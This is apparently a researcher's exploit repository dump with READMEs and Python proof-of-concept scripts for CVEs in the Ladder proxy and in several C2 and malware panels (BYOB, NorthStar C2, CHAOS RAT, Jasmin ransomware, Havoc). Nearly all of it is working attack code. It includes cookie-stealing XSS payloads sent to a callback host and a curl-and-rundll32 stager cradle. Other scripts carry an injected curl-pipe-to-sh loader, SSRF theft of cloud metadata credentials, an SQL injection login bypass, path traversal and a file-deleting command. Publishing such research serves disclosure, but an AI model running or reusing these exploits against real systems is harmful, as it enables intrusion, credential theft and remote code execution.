├── BYOB-RCE
    ├── README.md
    ├── database.db
    └── exploit.py
├── CVE-2024-27620: Ladder Unauth SSRF
    └── exploit.py
├── CVE-2024-28741: Northstar C2 Unauth XSS
    ├── README.md
    └── exploit.py
├── CVE-2024-30850: CHAOS RAT RCE
    ├── README.md
    ├── exploit.py
    └── rickroll.mp4
├── CVE-2024-30851: Jasmin Ransomware Unauth LFI
    ├── README.md
    └── exploit.py
├── CVE-2024-41570: Havoc C2 Unauth SSRF
    ├── README.md
    └── exploit.py
├── CVE-2024-46506: Unauthenticated RCE in NetAlertx
├── CVE-2024-46507: Yeti Platform SSTI
└── CVE-2025-27090: Sliver C2 SSRF
    ├── README.md
    └── exploit.py


/BYOB-RCE/README.md:
--------------------------------------------------------------------------------
 1 | ### BYOB (Build Your Own Botnet) Unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)
 2 | 
 3 | This exploit works by spoofing an agent exfiltrating a file (CVE-2024-45257) to overwrite the sqlite database and bypass authentication.  After authentication is bypassed, a command injection vulnerability is exploited in the payload builder page.
 4 | 
 5 | Full analysis: https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/
 6 | 
 7 | https://github.com/user-attachments/assets/9b6ab096-389e-4060-8eb4-2bd2dc3634c8
 8 | 
 9 | ```
10 | python3 exploit.py -h
11 | usage: exploit.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [-A USER_AGENT] -c COMMAND
12 | 
13 | options:
14 |   -h, --help            show this help message and exit
15 |   -t TARGET, --target TARGET
16 |                         The target URL of the BYOB admin panel
17 |   -u USERNAME, --username USERNAME
18 |                         The username to set for the new admin account
19 |   -p PASSWORD, --password PASSWORD
20 |                         The password to set for the new admin account
21 |   -A USER_AGENT, --user-agent USER_AGENT
22 |                         The user-agent to use for requests
23 |   -c COMMAND, --command COMMAND
24 |                         The command to execute on the BYOB server
25 | ```
26 | 


--------------------------------------------------------------------------------
/BYOB-RCE/database.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chebuya/exploits/c125b570e982ac7c3d2a617f81a495d123c5262f/BYOB-RCE/database.db


--------------------------------------------------------------------------------
/BYOB-RCE/exploit.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution)
  2 | # Date: 2024-08-14
  3 | # Exploit Author: @_chebuya
  4 | # Software Link: https://github.com/malwaredllc/byob
  5 | # Version: v2.0.0
  6 | # Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy
  7 | # CVE: CVE-2024-45256, CVE-2024-45257
  8 | # Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page
  9 | # Github: https://github.com/chebuya/exploits/tree/main/BYOB-RCE
 10 | # Blog: https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/
 11 | import sys
 12 | import json
 13 | import base64
 14 | import string
 15 | import random
 16 | import argparse
 17 | import requests
 18 | 
 19 | from bs4 import BeautifulSoup
 20 | 
 21 | 
 22 | def get_csrf(session, url):
 23 |     r = session.get(url)
 24 |     soup = BeautifulSoup(r.text, 'html.parser')
 25 |     csrf_token = soup.find('input', {'name': 'csrf_token'})['value']
 26 |     return csrf_token
 27 | 
 28 | 
 29 | def upload_database(session, url, filename):
 30 |     with open('database.db', 'rb') as f:
 31 |         bindata = f.read()
 32 |     data = base64.b64encode(bindata).decode('ascii')
 33 |     json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"}
 34 |     headers = {
 35 |         'Content-Length': str(len(json.dumps(json_data)))
 36 |     }
 37 |     print("[***] Uploading database")
 38 |     upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers)
 39 |     print(upload_response.status_code)
 40 |     return upload_response.status_code
 41 | 
 42 | 
 43 | def exploit(url, username, password, user_agent, command):
 44 |     s = requests.Session()
 45 |     # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process
 46 |     filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"]
 47 |     failed = True
 48 |     for filepath in filepaths:
 49 |         if upload_database(s, url, filepath) != 500:
 50 |             failed = False
 51 |             break
 52 |     if failed:
 53 |         print("[!!!] Failed to upload database, exiting")
 54 |         sys.exit(1)
 55 | 
 56 |     if password is None:
 57 |         password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)])
 58 |     print(username + ":" + password)
 59 | 
 60 |     register_csrf = get_csrf(s, f'{url}/register')
 61 |     headers = {
 62 |         'User-Agent': user_agent,
 63 |         'Content-Type': 'application/x-www-form-urlencoded',
 64 |     }
 65 |     data = {
 66 |         'csrf_token': register_csrf,
 67 |         'username': username,
 68 |         'password': password,
 69 |         'confirm_password': password,
 70 |         'submit': 'Sign Up'
 71 |     }
 72 |     print("[***] Registering user   ")
 73 |     register_response = s.post(f'{url}/register', headers=headers, data=data)
 74 |     print(register_response.status_code)
 75 | 
 76 |     login_csrf = get_csrf(s, f'{url}/login')
 77 |     data = {
 78 |         'csrf_token': login_csrf,
 79 |         'username': username,
 80 |         'password': password,
 81 |         'submit': 'Log In'
 82 |     }
 83 |     print("[***] Logging in")
 84 |     login_response = s.post(f'{url}/login', headers=headers, data=data)
 85 |     print(login_response.status_code)
 86 | 
 87 |     headers = {
 88 |         'User-Agent': user_agent,
 89 |         'Content-Type': 'application/x-www-form-urlencoded',
 90 |     }
 91 |     data = f'format=exe&operating_system=nix$({command})&architecture=amd64'
 92 |     try:
 93 |         s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001)
 94 |     except requests.exceptions.ReadTimeout:
 95 |         pass
 96 | 
 97 | 
 98 | parser = argparse.ArgumentParser()
 99 | parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True)
100 | parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin')
101 | parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None)
102 | parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36')
103 | parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True)
104 | 
105 | args = parser.parse_args()
106 | 
107 | exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command)
108 | 


--------------------------------------------------------------------------------
/CVE-2024-27620: Ladder Unauth SSRF/exploit.py:
--------------------------------------------------------------------------------
 1 | # Exploit Title: Ladder v0.0.21 Server-side request forgery (SSRF)
 2 | # Date: 2024-01-20
 3 | # Exploit Author: @_chebuya
 4 | # Software Link: https://github.com/everywall/ladder
 5 | # Version: v0.0.1 - v0.0.21
 6 | # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
 7 | # CVE: CVE-2024-27620
 8 | # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context.  An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs
 9 | import requests
10 | import json
11 | 
12 | target_url = "http://127.0.0.1:8080/api/"
13 | imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
14 | 
15 | r = requests.get(target_url + imdsv1_url)
16 | response_json = json.loads(r.text)
17 | print(response_json["body"])
18 | 


--------------------------------------------------------------------------------
/CVE-2024-28741: Northstar C2 Unauth XSS/README.md:
--------------------------------------------------------------------------------
 1 | # NorthStar C2 agent RCE via stored XSS
 2 | Agent RCE PoC for CVE-2024-28741, a stored XSS vulnerability in NorthStar C2.
 3 | 
 4 | This exploit works by sending multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This XSS can be leveraged to execute commands on NorthStar C2 agents
 5 | 
 6 | Full explanation: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/
 7 | 
 8 | 
 9 | https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc/assets/146861503/182070a5-1a70-4875-b440-867ee3f43c6f
10 | 
11 | 


--------------------------------------------------------------------------------
/CVE-2024-28741: Northstar C2 Unauth XSS/exploit.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: NorthStar C2 agent RCE via stored XSS
  2 | # Date: 2024-03-11
  3 | # Exploit Author: @_chebuya
  4 | # Software Link: https://github.com/EnginDemirbilek/NorthStarC2
  5 | # Version: v1.0
  6 | # Tested on: Ubuntu 20.04 LTS
  7 | # CVE: CVE-2024-28741
  8 | # Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page.  This XSS can be leveraged to execute commands on NorthStar C2 agents
  9 | # Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/
 10 | from http.server import BaseHTTPRequestHandler, HTTPServer
 11 | from bs4 import BeautifulSoup
 12 | import requests
 13 | import base64
 14 | import threading
 15 | import time
 16 | import os
 17 | 
 18 | class Collector(BaseHTTPRequestHandler):
 19 |     def do_GET(self):
 20 |         cookie = self.path.split("=")[1]
 21 |         print("Cookie: " + cookie)
 22 |         self.send_response(200)
 23 |         self.end_headers()
 24 |         self.wfile.write(b"")
 25 | 
 26 |         background_thread = threading.Thread(target=steal_agents, args=(cookie,))
 27 |         background_thread.start()
 28 | 
 29 |         self.server.shutdown()
 30 | 
 31 | def agent_execute_command(agent_id, csrf_token, headers, command):
 32 |     data = {
 33 |         'slave': agent_id,
 34 |         'command': command,
 35 |         'sid': agent_id,
 36 |         'token': csrf_token
 37 |     }
 38 | 
 39 |     r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)
 40 | 
 41 |     while True:
 42 |         r = requests.get(target_url +  f"/getresponse.php?slave={agent_id}", headers=headers)
 43 |         if len(r.text) != 0 or command == "die":
 44 |             break
 45 |         
 46 |         time.sleep(1)
 47 | 
 48 | def steal_agents(cookie):
 49 |     headers = {
 50 |         "Cookie": f"PHPSESSID={cookie}"
 51 |     }
 52 |     r = requests.get(target_url + "/clients.php", headers=headers)
 53 |     soup = BeautifulSoup(r.text, 'html.parser')
 54 |     rows = soup.find_all('tr')
 55 | 
 56 |     agent_ids = []
 57 |     hostnames = []
 58 | 
 59 |     for row in rows:
 60 |         cells = row.find_all('td')
 61 |         if len(cells) != 9:
 62 |             continue
 63 | 
 64 |         status = cells[7].text.strip()
 65 |         if status != 'Online':
 66 |             continue
 67 | 
 68 |         agent_ids.append(cells[1].text.strip())
 69 |         hostnames.append(cells[5].text.strip())
 70 | 
 71 | 
 72 |     script_tags = soup.find_all('script')
 73 | 
 74 |     csrf_token = None
 75 |     for script_tag in script_tags:
 76 |         if 'csrfToken' in script_tag.text:
 77 |             csrf_token = script_tag.text.split('"')[1]
 78 |             break
 79 | 
 80 |     if csrf_token:
 81 |         print("CSRF Token:", csrf_token)
 82 |     else:
 83 |         print("CSRF Token not found")
 84 |         return
 85 | 
 86 |     for i in range(len(agent_ids)):
 87 |         agent_id = agent_ids[i]
 88 |         hostname = hostnames[i]
 89 |         print(f"Stealing {hostname} ({agent_id})...")
 90 | 
 91 |         print("Enabling shell mode")
 92 |         agent_execute_command(agent_id, csrf_token, headers, "enablecmd")
 93 |         print(f"Running sliver cradle: {cradle_command}")
 94 |         agent_execute_command(agent_id, csrf_token, headers, cradle_command)
 95 |         print("Disabling shell mode")
 96 |         agent_execute_command(agent_id, csrf_token, headers, "disablecmd")
 97 |         print("Sending suicide to slave")
 98 |         agent_execute_command(agent_id, csrf_token, headers, "die")
 99 | 
100 |     
101 |     print("Exploit finished, exiting")
102 |     os._exit(0)
103 | 
104 | 
105 | def xor_encryption(text, key):
106 |     encrypted_text = ""
107 |     
108 |     for i in range(len(text)):
109 |         encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))
110 |     
111 |     return encrypted_text
112 | 
113 | def generate_sid(sid):
114 |     encrypted_sid = xor_encryption(sid, "northstar")
115 | 
116 |     return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()
117 | 
118 | def exploit(target_url, callback_url):
119 |     target_url = target_url.rstrip("/") + "/login.php"
120 | 
121 |     protocol = callback_url.split(":")[0] + "://"
122 |     host = callback_url.split("/")[2].split(":")[0]
123 |     h1, h2 = host[:len(host)//2], host[len(host)//2:]
124 |     
125 |     if callback_url.count(":") == 2:
126 |         port = callback_url.split(":")[2]
127 |     else:
128 |         if protocol == "https://":
129 |             port = "443"
130 |         else:
131 |             port = "80"
132 | 
133 |     sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]
134 |     for sid in sid_payloads:
135 |         print(sid)
136 |         params = {
137 |             'sid': generate_sid(sid)
138 |         }
139 | 
140 |         requests.get(target_url, params=params, verify=False)
141 | 
142 | def run(port):
143 |     server_address = ('', int(port))
144 |     httpd = HTTPServer(server_address, Collector)
145 |     print(f'Server running on port {port}')
146 |     httpd.serve_forever()
147 | 
148 | cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"
149 | 
150 | callback_host = "192.168.1.6"
151 | callback_port = "8080"
152 | 
153 | target_url = "http://192.168.1.4:80"
154 | callback_url = f"http://{callback_host}:{callback_port}"
155 | 
156 | print("Sending malicious agent registrations...")
157 | exploit(target_url, callback_url)
158 | print("Registrations finished, waiting for execution...")
159 | run(callback_port)
160 | 


--------------------------------------------------------------------------------
/CVE-2024-30850: CHAOS RAT RCE/README.md:
--------------------------------------------------------------------------------
 1 | https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc/assets/146861503/ac03c8c7-54b3-4280-9f29-719c44af5192
 2 | # CHAOS RAT v5.01 web panel RCE (CVE-2024-30850, CVE-2024-31839)
 3 | https://github.com/tiagorlampert/CHAOS <br>
 4 | 
 5 | This exploit works by spoofing an agent callback for an XSS (CVE-2024-31839), and leveraging the XSS to exploit a command injection vulnerability (CVE-2024-30850) in the admin web panel.  This leads to compromise of the RAT server and rickrolling of RAT panel operators.
 6 | 
 7 | Full explaination: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/ <br>
 8 | 
 9 | ```
10 | python3 exploit.py exploit -h                                                               
11 | usage: exploit.py exploit [-h] [-f FILE] [-t TARGET] [-c COMMAND] [-v VIDEO_NAME] [-j JWT] -l LOCAL_IP [-p LOCAL_PORT] [-H HOSTNAME] [-u USERNAME] [-o OS]
12 |                           [-m MAC] [-i IP]
13 | 
14 | options:
15 |   -h, --help            show this help message and exit
16 |   -f FILE, --file FILE  The path to the CHAOS client
17 |   -t TARGET, --target TARGET
18 |                         The url of the CHAOS server (127.0.0.1:8080)
19 |   -c COMMAND, --command COMMAND
20 |                         The command to use
21 |   -v VIDEO_NAME, --video-name VIDEO_NAME
22 |                         The video name to use
23 |   -j JWT, --jwt JWT     The JWT token to use
24 |   -l LOCAL_IP, --local-ip LOCAL_IP
25 |                         The local IP to use for serving bash script and mp4
26 |   -p LOCAL_PORT, --local-port LOCAL_PORT
27 |                         The local port to use for serving bash script and mp4
28 |   -H HOSTNAME, --hostname HOSTNAME
29 |                         The hostname to use for the spoofed client
30 |   -u USERNAME, --username USERNAME
31 |                         The username to use for the spoofed client
32 |   -o OS, --os OS        The OS to use for the spoofed client
33 |   -m MAC, --mac MAC     The MAC address to use for the spoofed client
34 |   -i IP, --ip IP        The IP address to use for the spoofed client
35 | ```
36 | ![oopsec](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc/assets/146861503/25835d48-d967-495a-8e84-756153a82246)
37 | 
38 | 
39 | 


--------------------------------------------------------------------------------
/CVE-2024-30850: CHAOS RAT RCE/exploit.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: CHAOS RAT v5.0.1 RCE
  2 | # Date: 2024-04-05
  3 | # Exploit Author: @_chebuya
  4 | # Software Link: https://github.com/tiagorlampert/CHAOS
  5 | # Version: v5.0.1 
  6 | # Tested on: Ubuntu 20.04 LTS
  7 | # CVE: CVE-2024-30850, CVE-2024-31839
  8 | # Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server
  9 | # Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc
 10 | # Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/
 11 | import time
 12 | import requests
 13 | import threading
 14 | import json
 15 | import websocket
 16 | import http.client
 17 | import argparse
 18 | import sys
 19 | import re
 20 | 
 21 | from functools import partial
 22 | from http.server import BaseHTTPRequestHandler, HTTPServer
 23 | 
 24 | class Collector(BaseHTTPRequestHandler):
 25 |     def __init__(self, ip, port, target, command, video_name, *args, **kwargs):
 26 |         self.ip = ip
 27 |         self.port = port
 28 |         self.target = target
 29 |         self.shell_command = command
 30 |         self.video_name = video_name 
 31 |         super().__init__(*args, **kwargs)
 32 | 
 33 |     def do_GET(self):
 34 |         if self.path == "/loader.sh":
 35 |             self.send_response(200)
 36 |             self.end_headers()
 37 |             command = str.encode(self.shell_command)
 38 |             self.wfile.write(command)
 39 |         elif self.path == "/video.mp4":
 40 |             with open(self.video_name, 'rb') as f:
 41 |                 self.send_response(200)
 42 |                 self.send_header('Content-type', 'video/mp4')
 43 |                 self.end_headers()
 44 |                 self.wfile.write(f.read())
 45 |         else:
 46 |             cookie = self.path.split("=")[1]
 47 |             self.send_response(200)
 48 |             self.end_headers()
 49 |             self.wfile.write(b"")
 50 | 
 51 |             background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))
 52 |             background_thread.start()
 53 | 
 54 | def convert_to_int_array(string):
 55 |     int_array = []
 56 |     for char in string:
 57 |         int_array.append(ord(char))
 58 |     return int_array
 59 | 
 60 | def extract_client_info(path):
 61 |     with open(path, 'rb') as f:
 62 |         data = str(f.read())
 63 | 
 64 |     address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
 65 |     address_pattern = re.compile(address_regexp)
 66 |     address = address_pattern.findall(data)[0].split("=")[1]
 67 | 
 68 |     port_regexp = r"main\.Port=\d{1,6}"
 69 |     port_pattern = re.compile(port_regexp)
 70 |     port = port_pattern.findall(data)[0].split("=")[1]
 71 | 
 72 |     jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"
 73 |     jwt_pattern = re.compile(jwt_regexp)
 74 |     jwt = jwt_pattern.findall(data)[0].split("=")[1]
 75 | 
 76 |     return f"{address}:{port}", jwt
 77 | 
 78 | def keep_connection(target, cookie, hostname, username, os_name, mac, ip):
 79 | 
 80 |     print("Spoofing agent connection")
 81 |     headers = {
 82 |             "Cookie": f"jwt={cookie}"
 83 |     }
 84 | 
 85 |     while True:
 86 |         data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}
 87 |         r = requests.get(f"http://{target}/health", headers=headers)
 88 |         r = requests.post(f"http://{target}/device", headers=headers, json=data)
 89 |         time.sleep(30)
 90 | 
 91 | def handle_command(target, cookie, mac, ip, port):
 92 |     print("Waiting to serve malicious command outupt")
 93 |     headers = {
 94 |         "Cookie": f"jwt={cookie}",
 95 |         "X-Client": mac
 96 |     }
 97 | 
 98 |     ws = websocket.WebSocket()
 99 |     ws.connect(f'ws://{target}/client', header=headers)
100 |     while True:
101 |         response = ws.recv()
102 | 
103 |         command = json.loads(response)['command']
104 |         data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}
105 | 
106 |         ws.send_binary(json.dumps(data))
107 | 
108 | 
109 | def run_exploit(cookie, target, ip, port):
110 |     print(f"Exploiting {target} with JWT {cookie}")
111 |     conn = http.client.HTTPConnection(target)
112 |     headers = {
113 |         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
114 |         'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',
115 |         'Cookie': f'jwt={cookie}'
116 |     }
117 |     conn.request(
118 |         'POST',
119 |         '/generate',
120 |         f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',
121 |         headers
122 |     )
123 | 
124 | def run(ip, port, target, command, video_name):
125 |     server_address = (ip, int(port))
126 | 
127 |     collector = partial(Collector, ip, port, target, command, video_name)
128 |     httpd = HTTPServer(server_address, collector)
129 |     print(f'Server running on port {ip}:{port}')
130 |     httpd.serve_forever()
131 | 
132 | if __name__ == "__main__":
133 |     parser = argparse.ArgumentParser()
134 |     subparsers = parser.add_subparsers(dest="option")
135 | 
136 |     exploit = subparsers.add_parser("exploit")
137 |     exploit.add_argument("-f", "--file",  help="The path to the CHAOS client")
138 |     exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")
139 |     exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")
140 |     exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")
141 |     exploit.add_argument("-j", "--jwt", help="The JWT token to use")
142 |     exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)
143 |     exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)
144 |     exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")
145 |     exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")
146 |     exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")
147 |     exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")
148 |     exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")
149 | 
150 |     extract = subparsers.add_parser("extract")
151 |     extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)
152 | 
153 |     args = parser.parse_args()
154 | 
155 |     if args.option == "exploit":
156 |         if args.target != None and args.jwt != None:
157 |             target = args.target
158 |             jwt = args.jwt
159 |         elif args.file != None:
160 |             target, jwt = extract_client_info(args.file)
161 |         else:
162 |             exploit.print_help(sys.stderr)
163 |             sys.exit(1)
164 | 
165 |         bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))
166 |         bg.start()
167 | 
168 |         cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))
169 |         cmd.start()
170 | 
171 |         server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))
172 |         server.start()
173 | 
174 |     elif args.option == "extract":
175 |         target, jwt = extract_client_info(args.file)
176 |         print(f"CHAOS server: {target}\nJWT: {jwt}")
177 |     else:
178 |         parser.print_help(sys.stderr)
179 |         sys.exit(1)
180 | 


--------------------------------------------------------------------------------
/CVE-2024-30850: CHAOS RAT RCE/rickroll.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chebuya/exploits/c125b570e982ac7c3d2a617f81a495d123c5262f/CVE-2024-30850: CHAOS RAT RCE/rickroll.mp4


--------------------------------------------------------------------------------
/CVE-2024-30851: Jasmin Ransomware Unauth LFI/README.md:
--------------------------------------------------------------------------------
 1 | # Jasmin ransomware web panel path traversal PoC
 2 | #EducationalPurposes <br>
 3 | https://github.com/codesiddhant/Jasmin-Ransomware <br>
 4 | I discovered a pre-auth path traversal vulnerability in the Jasmin Ransomware web panel (CVE-2024-30851), allowing an attacker to deanonymize panel operators and dump decryption keys.  Jasmin ransomware was observed in a recent TeamCity (CVE-2024-27198, CVE-2024-27199) exploitation campaign (https://twitter.com/brody_n77/status/1765145148227555826)
 5 | 
 6 | [Screencast from 2024-04-04 18-51-07.webm](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/assets/146861503/82f412f0-9321-4c0b-a74d-27973ba338a6)
 7 | 
 8 | ### Execution after redirect (CWE-698)
 9 | The affected endpoint (Jasmin-Ransomware/Web Panel/download_file.php) fails to die() after sending the Location header.   This allows an attacker to bypass authentication requirements.  The call to readfile is unsanitized allowing an attacker to read arbitrary files.
10 | ```php
11 | <?php
12 | session_start();
13 | if(!isset($_SESSION['username']) ){
14 | 	header("Location: login.php");
15 | }
16 | $file=$_GET['file'];
17 | if(!empty($file)){
18 |     // Define headers
19 |     header("Cache-Control: public");
20 |     header("Content-Description: File Transfer");
21 |     header("Content-Disposition: attachment; filename=$file");
22 |     header("Content-Type: text/encoded");
23 |     header("Content-Transfer-Encoding: binary");
24 |     
25 |     // Read the file
26 |    readfile($file);
27 | ```
28 | 
29 | 
30 | There is also a bunch of SQLi, one of them is exploited to bypass the login and obtain the filenames of decryption keys
31 | 


--------------------------------------------------------------------------------
/CVE-2024-30851: Jasmin Ransomware Unauth LFI/exploit.py:
--------------------------------------------------------------------------------
 1 | # Exploit Title: Jasmin Ransomware arbitrary file read
 2 | # Date: 2024-04-04
 3 | # Exploit Author: @_chebuya
 4 | # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
 5 | # Version: v1.1
 6 | # Tested on: Ubuntu 20.04 LTS
 7 | # CVE: CVE-2024-30851
 8 | # Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login
 9 | # Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main
10 | import requests
11 | import argparse
12 | import os
13 | from bs4 import BeautifulSoup
14 | 
15 | def get_file(jasmin_url, filepath):
16 |     response = requests.get(
17 |         f'{jasmin_url}/download_file.php?file={filepath}',
18 |         allow_redirects=False
19 |     )
20 | 
21 |     return response.text
22 | 
23 | 
24 | def get_keys(jasmin_url):
25 |     headers = {
26 |         'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
27 |     }
28 | 
29 |     data = "username=&password='+or+1%3D1+--+-&service=login"
30 |     login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)
31 |     cookies = login_req.cookies
32 | 
33 |     list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)
34 |     soup = BeautifulSoup(list_req.text, 'html.parser')
35 | 
36 |     rows = soup.find_all('tr')
37 | 
38 |     print(f"Dumping decryption keys from {len(rows)-1} victims")
39 |     for row in rows:
40 |         data = row.find_all('td')
41 |         if len(data) == 0:
42 |             continue
43 |         
44 |         username = data[1].get_text()
45 |         hostname = data[0].get_text()
46 |         filepath = data[7].find('a')['href'].split("=")[1]
47 | 
48 |         print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")
49 | 
50 | 
51 | parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")
52 | subparser = parser.add_subparsers(dest='subcommand')
53 | 
54 | file_parser = subparser.add_parser("getfile", help="Read a file off the server")
55 | file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")
56 | file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!
57 | 
58 | keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
59 | keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")
60 | 
61 | args = parser.parse_args()
62 | 
63 | if args.subcommand != None:
64 |     target_url = args.url.rstrip("/")
65 | 
66 | if args.subcommand == "getkeys":
67 |     get_keys(target_url)
68 | elif args.subcommand == "getfile":
69 |     target_file = args.file.replace("\\", "/").replace("c:", "")
70 |     target_path = os.path.join("../../../../../../../../../", target_file)
71 |     print(get_file(target_url, target_path))
72 | else:
73 |     parser.print_help()
74 | 


--------------------------------------------------------------------------------
/CVE-2024-41570: Havoc C2 Unauth SSRF/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2024-41570: Havoc-C2-SSRF-poc
 2 | This vulnerability is exploited by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
